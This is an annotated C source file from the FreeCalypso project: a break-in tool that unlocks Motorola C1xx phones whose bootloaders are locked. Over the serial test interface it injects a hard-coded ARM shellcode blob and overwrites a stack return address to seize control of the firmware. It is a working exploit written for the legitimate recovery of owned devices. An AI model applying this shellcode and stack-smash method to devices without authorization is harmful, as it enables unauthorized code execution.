annotate rvinterf/lowlevel/tfc139.c @ 1012:93f4fc26b204

fc-shell: arbitrary send command implemented in one-shot mode
author Mychaela Falconia <falcon@ivan.Harhan.ORG>
date Sun, 20 Mar 2016 22:06:11 +0000
parents 65418b391513
children
1 /*
2 * This program facilitates the recovery of those Compal/Motorola phones
3 * whose bootloaders have been maliciously locked down. It connects
4 * to a running Mot C1xx firmware through the RVTMUX interface provided
5 * by the latter and uses the Test Mode memory write command (which
6 * these firmwares implement just like TI's reference fw) to inject
7 * some shellcode and to transfer control to it by overwriting a
8 * function return address on the stack. The injected shellcode then
9 * enables the Calypso boot ROM and jumps to it, allowing fc-loadtool
10 * to take over from there.
11 */
12
13 #include <sys/types.h>
14 #include <sys/errno.h>
15 #include <stdio.h>
16 #include <string.h>
17 #include <strings.h>
18 #include <stdlib.h>
19 #include <unistd.h>
20 #include <time.h>
21 #include "../include/pktmux.h"
22 #include "../include/limits.h"
23
/* serial port fd to the target; presumably set by open_target_serial()
 * (defined elsewhere) before main() starts select()ing on it */
extern int target_fd;
/* baud rate as a string; main() defaults it to "57600", -B overrides */
extern char *baudrate_name;

/* receive packet buffer and its length, owned by the rx code elsewhere;
 * not referenced in this file's visible portion */
extern u_char rxpkt[];
extern size_t rxpkt_len;

char *logfname;		/* -l option: log file name, or NULL for no log */
FILE *logF;		/* the open log file when logfname is set */
time_t logtime;		/* refreshed by main() before each rx pass */
int no_output; /* for output.c */

/* -w option (parsed as unsigned via strtoul); not consumed in this
 * file's visible portion, presumably used by the rx/wakeup code */
int wakeup_after_sec = 1;

/* see ../../target-utils/tf-breakin/payload.S for the source */
/* NOTE(review): the explicit [114] must match the initializer count
 * (14 rows of 8 plus 2); sizeof shellcode is what gets sent, so a
 * short initializer would silently pad the write with zeros. */
static u_char shellcode[114] = {
	0x78, 0x47, 0xC0, 0x46, 0xD3, 0xF0, 0x21, 0xE3,
	0x50, 0x10, 0x9F, 0xE5, 0xF5, 0x00, 0xA0, 0xE3,
	0xB2, 0x00, 0xC1, 0xE1, 0xA0, 0x00, 0xA0, 0xE3,
	0xB2, 0x00, 0xC1, 0xE1, 0x40, 0x60, 0x9F, 0xE5,
	0x05, 0x00, 0xD6, 0xE5, 0x20, 0x00, 0x10, 0xE3,
	0xFC, 0xFF, 0xFF, 0x0A, 0x38, 0x10, 0x8F, 0xE2,
	0x06, 0x20, 0xA0, 0xE3, 0x01, 0x00, 0xD1, 0xE4,
	0x00, 0x00, 0xC6, 0xE5, 0x01, 0x20, 0x52, 0xE2,
	0xFB, 0xFF, 0xFF, 0x1A, 0x05, 0x00, 0xD6, 0xE5,
	0x40, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A,
	0x10, 0x10, 0x9F, 0xE5, 0x01, 0x2C, 0xA0, 0xE3,
	0xB0, 0x20, 0xC1, 0xE1, 0x00, 0xF0, 0xA0, 0xE3,
	0x02, 0xF8, 0xFF, 0xFF, 0x00, 0x58, 0xFF, 0xFF,
	0x10, 0xFB, 0xFF, 0xFF, 0x02, 0x02, 0x02, 0x4F,
	0x4B, 0x02
};

/* target RAM address the shellcode is written to: -a (hex), or the
 * fixed 0x800000 selected by -m */
static unsigned shellcode_load_addr;
/* address of the saved return address to overwrite: -s (hex), or the
 * fixed 0x837C54 selected by -m; zero makes main() send the MEMCHECK
 * query instead of calling initiate_breakin() */
static unsigned stack_smash_addr;
/* 1 = Thumb-mode entry into the shellcode (default); -A and -m select
 * ARM-mode entry, see initiate_breakin() for the address adjustment */
static int thumb_entry = 1;

/* 4-byte little-endian jump address filled in by initiate_breakin();
 * the code that writes it to stack_smash_addr is not in this file's
 * visible portion */
static u_char stack_smash_payload[4];
/* set by initiate_breakin() once the shellcode RAM write has been sent;
 * consumer not visible here */
static int breakin_in_progress;

/* tty path from argv, saved by main(); consumer not visible here */
static char *target_tty_port;
64
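/*
 * Build and send an old-style TM3 MEM_WRITE command (opcode 0x40) to the
 * target via the RVTMUX Test Mode channel.
 *
 * Packet layout produced here: [0] RVT_TM_HEADER, [1] 0x40, [2..5] addr
 * as little-endian, [6..] the payload bytes, followed by one XOR
 * checksum byte covering everything after the RVT header byte.  The
 * finished packet goes to send_pkt_to_target() (defined elsewhere).
 *
 * addr:        target memory address to write.
 * payload:     bytes to write; not modified.
 * payload_len: number of payload bytes.  Header (6), payload and
 *              checksum (1) must all fit in pkt[]; an oversized request
 *              is reported on stderr and dropped instead of overrunning
 *              the host-side stack buffer.
 */
static void
send_compal_memwrite(unsigned addr, const u_char *payload, size_t payload_len)
{
	u_char pkt[MAX_PKT_TO_TARGET];
	int i, csum, csum_offset;

	/* 6 header bytes + payload + 1 checksum byte must fit in pkt[] */
	if (payload_len + 7 > sizeof pkt) {
		fprintf(stderr,
			"send_compal_memwrite: payload of %lu bytes too large\n",
			(unsigned long) payload_len);
		return;
	}
	pkt[0] = RVT_TM_HEADER;
	pkt[1] = 0x40;		/* old TM3 MEM_WRITE command */
	pkt[2] = addr;
	pkt[3] = addr >> 8;
	pkt[4] = addr >> 16;
	pkt[5] = addr >> 24;
	memcpy(pkt + 6, payload, payload_len);
	csum_offset = (int) payload_len + 6;
	/* XOR over opcode, address and payload; the RVT header is excluded */
	csum = 0;
	for (i = 1; i < csum_offset; i++)
		csum ^= pkt[i];
	pkt[csum_offset] = csum;
	/* int length argument kept as in the original call convention */
	send_pkt_to_target(pkt, csum_offset + 1);
}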
87
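/*
 * Start the break-in sequence: report the addresses in use, derive the
 * entry address that will later replace the saved return address, and
 * push the shellcode into target RAM with one TM MEM_WRITE.
 *
 * Reads shellcode_load_addr, stack_smash_addr and thumb_entry; writes
 * stack_smash_payload (4 bytes, little-endian) and sets
 * breakin_in_progress.  The write to stack_smash_addr itself is not
 * issued here; presumably the rx path does that once the RAM write has
 * been acknowledged (not visible in this file).
 *
 * Entry address: +1 marks a Thumb-mode entry (low bit set), ARM-mode
 * entry instead starts 4 bytes into the shellcode -- see payload.S.
 */
static void
initiate_breakin(void)
{
	char msgbuf[80];
	unsigned jump_addr;

	/* bounded: two %x fields add at most 16 chars to the 58-char text */
	snprintf(msgbuf, sizeof msgbuf,
		"Using shellcode load addr 0x%x, stack smash starting addr 0x%x",
		shellcode_load_addr, stack_smash_addr);
	output_line(msgbuf);
	jump_addr = shellcode_load_addr;
	if (thumb_entry)
		jump_addr += 1;
	else
		jump_addr += 4;
	stack_smash_payload[0] = jump_addr;
	stack_smash_payload[1] = jump_addr >> 8;
	stack_smash_payload[2] = jump_addr >> 16;
	stack_smash_payload[3] = jump_addr >> 24;
	output_line("Sending shellcode RAM write");
	send_compal_memwrite(shellcode_load_addr, shellcode, sizeof shellcode);
	breakin_in_progress = 1;
}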
111
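/*
 * Send the GPF "PCO L1 MEMCHECK" system primitive to the target, framed
 * with RVT_L23_HEADER.  main() takes this path when no -s address was
 * given; whatever is done with the reply happens elsewhere.
 *
 * Packet layout: [0] RVT_L23_HEADER, [1] 0xB7 (system prim), [2..3] the
 * value 20 as 16-bit little-endian (presumably a length or primitive id;
 * confirm against the GPF definition), [4..7] zero timestamp, then the
 * NUL-terminated string.  The string is copied with memcpy sized from
 * the literal and the buffer is sized from it too, so the bytes sent
 * and the length passed to send_pkt_to_target() cannot drift apart
 * (24 bytes, as before).
 */
static void
send_memcheck_query(void)
{
	static const char memcheck_str[] = "PCO L1 MEMCHECK";
	u_char sendpkt[8 + sizeof memcheck_str];

	output_line("Sending GPF MEMCHECK query");
	/* fill out the packet */
	sendpkt[0] = RVT_L23_HEADER;
	sendpkt[1] = 0xB7;	/* system prim */
	sendpkt[2] = 20;
	sendpkt[3] = 0;
	/* send zeros for the timestamp */
	memset(sendpkt + 4, 0, 4);
	/* fixed string with all fields, including the terminating NUL */
	memcpy(sendpkt + 8, memcheck_str, sizeof memcheck_str);
	/* send it! */
	send_pkt_to_target(sendpkt, (int) sizeof sendpkt);
}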
133
134 main(argc, argv)
135 char **argv;
136 {
137 extern char *optarg;
138 extern int optind;
139 int c;
140 fd_set fds;
141
142 baudrate_name = "57600"; /* what C139 firmware uses */
143 while ((c = getopt(argc, argv, "a:AB:l:ms:w:")) != EOF)
144 switch (c) {
145 case 'a':
146 shellcode_load_addr = strtoul(optarg, 0, 16);
147 continue;
148 case 'B':
149 baudrate_name = optarg;
150 continue;
151 case 'l':
152 logfname = optarg;
153 continue;
154 case 'm':
155 /* mimic mot931c.exe */
156 shellcode_load_addr = 0x800000;
157 stack_smash_addr = 0x837C54;
158 /* FALL THRU */
159 case 'A':
160 thumb_entry = 0;
161 continue;
162 case 's':
163 stack_smash_addr = strtoul(optarg, 0, 16);
164 continue;
165 case 'w':
166 wakeup_after_sec = strtoul(optarg, 0, 0);
167 continue;
168 case '?':
169 default:
170 usage: fprintf(stderr,
171 "usage: %s [options] ttyport\n", argv[0]);
172 exit(1);
173 }
174 if (argc - optind != 1)
175 goto usage;
176 if (stack_smash_addr && !shellcode_load_addr) {
177 fprintf(stderr, "usage error: -a option required with -s\n");
178 exit(1);
179 }
180 open_target_serial(argv[optind]);
181 target_tty_port = argv[optind];
182
183 set_serial_nonblock(0);
184 setlinebuf(stdout);
185 if (logfname) {
186 logF = fopen(logfname, "w");
187 if (!logF) {
188 perror(logfname);
189 exit(1);
190 }
191 setlinebuf(logF);
192 fprintf(logF, "*** Log of TFC139 break-in session ***\n");
193 }
194 time(&logtime);
195 if (stack_smash_addr)
196 initiate_breakin();
197 else
198 send_memcheck_query();
199 for (;;) {
200 FD_ZERO(&fds);
201 FD_SET(target_fd, &fds);
202 c = select(target_fd+1, &fds, 0, 0, 0);
203 time(&logtime);
204 if (c < 0) {
205 if (errno == EINTR)
206 continue;
207 perror("select");
208 exit(1);
209 }
210 if (FD_ISSET(target_fd, &fds))
211 process_serial_rx();
212 }
213 }
214
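/*
 * Handles a Test Mode (TM) response packet while the break-in sequence
 * is running.  On the one response we expect, it sends the next 4-byte
 * piece of the stack smash payload with send_compal_memwrite() and
 * advances stack_smash_addr by 4, so each acknowledged write triggers
 * the following one.
 *
 * Reads the globals rxpkt/rxpkt_len, breakin_in_progress,
 * stack_smash_addr and stack_smash_payload.  Any response that does
 * not match is reported via output_line() and otherwise ignored, which
 * stalls the sequence instead of continuing blindly.
 */
static void
handle_tm_response()
{
	char msgbuf[80];

	/* nothing to act on before initiate_breakin() has started the sequence */
	if (!breakin_in_progress) {
		output_line("TM response unexpected at this time");
		return;
	}
	/*
	 * Expected shape: 4 bytes, header byte in rxpkt[0], then
	 * 0x40, 0x00, 0x40 (presumably the ack of the previous memwrite;
	 * the exact TM semantics are not documented in this file).
	 */
	if (rxpkt_len != 4 || rxpkt[1] != 0x40 || rxpkt[2] || rxpkt[3] != 0x40){
		output_line("TM response differs from expected");
		return;
	}
	/* bounded formatting: msgbuf is fixed-size, never let a format overrun it */
	snprintf(msgbuf, sizeof msgbuf,
		 "Sending stack smash write at 0x%x", stack_smash_addr);
	output_line(msgbuf);
	/* one 4-byte word per acknowledged write, moving upward */
	send_compal_memwrite(stack_smash_addr, stack_smash_payload, 4);
	stack_smash_addr += 4;
}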
233
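/*
 * Scans a received L23 (GPF) trace packet for the L1 task stack report
 * and, when it is found, derives the addresses the break-in needs.
 *
 * Reads the global rxpkt/rxpkt_len.  A packet that fails the framing
 * checks or does not carry the expected text is silently ignored: this
 * runs on every L23 packet until the right one arrives.  On a
 * successful parse it sets stack_smash_addr (and shellcode_load_addr,
 * if nothing set it beforehand) and calls initiate_breakin().  Exits
 * the process when the report is present but unusable: misaligned
 * stack base, or less untouched room than sizeof shellcode.
 */
static void
analyze_gpf_packet()
{
	unsigned stackbase, untouched;
	static const char format[] =
	  "Name:L1 Stat:%*s Count:%*s Prio:%*s Stack:%x Size:%*s Untouched:%u";
	char msgbuf[80];

	/*
	 * Length window: at least the 16-byte prefix plus one byte of
	 * text, at most 128.  NOTE(review): the NUL store below writes
	 * rxpkt[rxpkt_len], so this upper bound is only safe if rxpkt
	 * holds at least 129 bytes — confirm against its declaration.
	 */
	if (rxpkt_len < 17 || rxpkt_len > 128)
		return;
	/* it needs to be a trace packet */
	if ((rxpkt[1] & 0xF0) != 0xA0)
		return;
	/* the embedded length byte must agree with what was received */
	if (rxpkt[2] + 4 != rxpkt_len)
		return;
	/* byte 3 is expected to be zero */
	if (rxpkt[3])
		return;
	/* skip timestamp, check src and dest */
	if (strncmp((const char *)rxpkt + 8, "SYSTPCO ", 8))
		return;
	/* terminating NUL for sscanf */
	rxpkt[rxpkt_len] = '\0';
	/* both Stack: and Untouched: must convert, or this is not our line */
	if (sscanf((const char *)rxpkt + 16, format, &stackbase, &untouched)
	    != 2)
		return;
	/* success! */
	snprintf(msgbuf, sizeof msgbuf,
		 "Parsed L1 stack location: base=0x%x, untouched=%u (0x%x)",
		 stackbase, untouched, untouched);
	output_line(msgbuf);
	/* the break-in writes 4 bytes at a time (see handle_tm_response) */
	if (stackbase & 3) {
		output_line("Error: stack base address is not word-aligned");
		exit(1);
	}
	/* round the usable room down to whole words */
	untouched &= ~3;
	if (!shellcode_load_addr) {
		/* default load address is the stack base itself */
		if (untouched < sizeof shellcode) {
			output_line("Error: not enough room for shellcode");
			exit(1);
		}
		shellcode_load_addr = stackbase;
	}
	/* first address handle_tm_response() will write to */
	stack_smash_addr = stackbase + untouched;
	initiate_breakin();
}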
279
/*
 * Dispatches one received RVTMUX packet (global rxpkt/rxpkt_len) by its
 * header byte to the matching printer, hooking the break-in logic into
 * the L23 and TM paths.  A bare 2-byte "OK" packet is the success
 * indication (presumably emitted by the injected shellcode): report
 * it, tell the user what to run next and exit with status 0.
 *
 * Declared K&R-style with an implicit int return type; no value is
 * ever returned and callers do not use one.  The RVT_*_HEADER
 * constants come from a header not visible here.
 */
handle_rx_packet()
{
	int success_marker;

	success_marker = rxpkt_len == 2 && rxpkt[0] == 'O' && rxpkt[1] == 'K';
	if (success_marker) {
		output_line(
			"Success: target should now be in boot ROM download wait");
		printf("You can now run fc-loadtool -h compal -c none %s\n",
			target_tty_port);
		exit(0);
	}
	switch (rxpkt[0]) {
	case RVT_RV_HEADER:
		/* too short to be an RV trace: fall out and report as unknown */
		if (rxpkt_len >= 6) {
			print_rv_trace();
			return;
		}
		break;
	case RVT_L1_HEADER:
		print_l1_trace();
		return;
	case RVT_L23_HEADER:
		print_g23_trace();
		/* until the break-in starts, any L23 packet may be the one we need */
		if (!breakin_in_progress)
			analyze_gpf_packet();
		return;
	case RVT_TM_HEADER:
		print_tm_output_raw();
		handle_tm_response();
		return;
	default:
		break;
	}
	print_unknown_packet();
}